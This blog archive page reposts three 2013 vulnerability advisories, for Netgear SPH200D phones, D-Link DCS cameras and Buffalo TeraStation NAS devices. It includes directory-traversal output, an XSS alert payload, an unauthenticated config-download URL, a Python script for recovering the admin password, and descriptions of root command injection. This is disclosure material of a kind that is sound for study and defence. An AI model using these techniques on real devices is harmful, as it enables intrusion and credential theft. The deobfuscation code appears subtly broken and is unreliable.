Archive for 31 Ocak 2013

Netgear SPH200D Multiple Vulnerabilities

Netgear SPH200D Vergiyonunda genel açıklar bulunmuş olup, Açığıa ilişkin olarak açık bulucunun görüşleri aşağıdaki gibidir.

Device Name: SPH200D
Vendor: Netgear

============ Vulnerable Firmware Releases: ============

Firmware Version :
Kernel Version : 4.1-18
Web Server Version : 1.5

============ Device Description: ============

============ Shodan Torks ============

Shodan Search: SPH200D
=> Results 337 devices

============ Vulnerability Overview: ============

* directory traversal: 

Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.


HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0

demo:x:5000:100:Demo User:/home/demo:/bin/bash

If you request a directory you will get a very nice directory listing for browsing through the filesystem:

HTTP/1.0 200 OK
Content-type: text/html
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0

<H1>Index of ../../var/</H1>

<p><a href="/../../var/.">.</a></p>
<p><a href="/../../var/..">..</a></p>
<p><a href="/../../var/.Skype">.Skype</a></p>
<p><a href="/../../var/jffs2">jffs2</a></p>
<p><a href="/../../var/htdocs">htdocs</a></p>
<p><a href="/../../var/cnxt">cnxt</a></p>
<p><a href="/../../var/ppp">ppp</a></p>
<p><a href="/../../var/conf">conf</a></p>
<p><a href="/../../var/bin">bin</a></p>
<p><a href="/../../var/usr">usr</a></p>
<p><a href="/../../var/tmp">tmp</a></p>

So with this information you are able to access the skype configuration with the following request:


* For changing the current password there is no request to the current password 

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

* local path disclosure: 


The requested URL '/var/htdocs/%3C/' was not found on this server.


* reflected Cross Site Scripting 

Appending scripts to the URL reveals that this is not properly validated for malicious input.<script>alert(1)</script>e51c012502f


============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Advisory URL:
Twitter: @s3cur1ty_de

============ Time Line: ============

August 2012 - discovered vulnerability
07.08.2012 - reported vulnerability to Netgear
08.08.2012 - case closed by Netgear
29.01.2013 - public release

===================== Advisory end =====================

D-Link DCS Cameras – Multiple Vulnerabilities

D-Link DCS Cameras – Multiple Vulnerabilities
açılarına ilişkin olarak açık bulucun açıklamaları şu şekilde;

Unauthenticated remote access to D-Link DCS cameras

Title:    Unauthenticated remote access to D-Link DCS cameras
Discovery date: 20/06/2012
Release date:   28/01/2013
Credits:        Roberto Paleari (, twitter: @rpaleari)

Class:           Authentication bypass, Remote command execution

This security vulnerability affects the following products and firmware
   * D-Link DCS-930L, firmware version 1.04
   * D-Link DCS-932L, firmware version 1.02
Other products and firmware versions are probably also vulnerable, but they
were not checked.

D-Link DCS web cameras allow unauthenticated attackers to obtain the
configuration of the device remotely. A copy of the device configuration can be
obtained by accessing the following URL:

  http://<device IP address>/frame/GetConfig

The obtained configuration file is obfuscated using a trivial obfuscation
scheme. Python code for the deobfuscation follows (sorry, the code is quite a
mess :-)):

# 'data' holds the content of the obfuscated configuration file
def deobfuscate(data):
    r = []
    for c in data:
        c = ord(c)
        c = (c + ord('y')) & 0xff
        c = (c ^ ord('Z')) & 0xff
        c = (c - ord('e')) & 0xff

    tmp = None
    i = len(r) - 1
    while i >= 0:
        if i == len(r) - 1:
            x = r[i]
            tmp = ((x & 7) << 5) & 0xff

        if i == 0:
            assert tmp is not None
            x = r[0]
            x = (x >> 3) & 0xff
            x = (x + tmp) & 0xff
            r[0] = x
            c1 = r[i-1]
            c2 = r[i]
            c1 = c1 & 0x7
            c2 = (c2 >> 3) & 0xff
            c1 = (c1 << 5) & 0xff
            c2 = (c2 + c1) & 0xff
            r[i] = c2
        i = i - 1

    r = "".join([chr(x) for x in r])

    s = ""
    assert (len(r) % 2) == 0
    for i in range(len(r)/2):
        s += r[i+(len(r)/2)] + r[i]
    return s

The above procedure returns the deobfuscated ASCII version of the
configuration file. This file includes, among other things, also the web
password for the "admin" user.

As a side note, it is worth considering that, after exploiting this issue,
authenticated attackers can also leverage the undocumented /docmd.htm web page
to execute arbitrary commands on the affected devices.

This issue has been addressed by D-Link in the following firmware releases:
* DCS-930L V1.06B5 (August 15, 2012)
* DCS-932L V1.04B5 (August 15, 2012)

These updates are available through and have also been implemented
on DCS-942L and higher camera products.

    * 20/06/2012 - Initial vendor contact.

    * 11/07/2012 - The author provided D-Link with the details of the

    * 12/07/2012 - D-Link confirmed the issue is a new security vulnerability.

    * 26/01/2013 - D-Link confirmed the release of firmware versions that
             address the vulnerability.

    * 28/01/2013 - Public disclosure.

The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.

Buffalo TeraStation TS-Series – Multiple Vulnerabilities

Buffalo TeraStation TS-Series – Multiple Açıklarına ilişkin açıklamalar şu şekilde;

Title: Buffalo TeraStation TS-Series multiple vulnerabilities
Version affected: firmware version <= 1.5.7
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Twitter: @andreaf83
Status: unpatched

Buffalo's TeraStation network attached storage (NAS) solutions offer
centralized storage and backup for home, small office and business

The firmware is based on Linux ARM and most of the internal software
is written using Perl.

The vulnerabilities that I found allows any unauthenticated attacker
to access arbitrary files on the NAS filesystem and execute system
commands with root privileges.

Tested successfully on TS-XL, TS-RXL, TS-WXL, TS-HTGL/R5, TS-XEL with
the latest firmware installed (v1.57). Surely other versions with the
same firmware are vulnerable.

1]======== sync.cgi unauthenticated arbitrary file download ========
Requesting an unprotected cgi, it's possible, for an unauthenticated
user, to download any system file, included /etc/shadow, that contains
the password shadows for the application/system users.


Moreover, using the key "all" it's possible to download the entire
/var/log directory:


2]======== NTP command injection ========
This vulnerability allows authenticated users to execute arbitrary
commands on the system with root privileges.

This is a sample request:
Content-Length: 89
Cookie: webui_session_admin=xxxxxxxxxxxxxxxxxxxxxx_en_0


It's possible to view the command output using the previous
vulnerability (reading the /tmp/output file).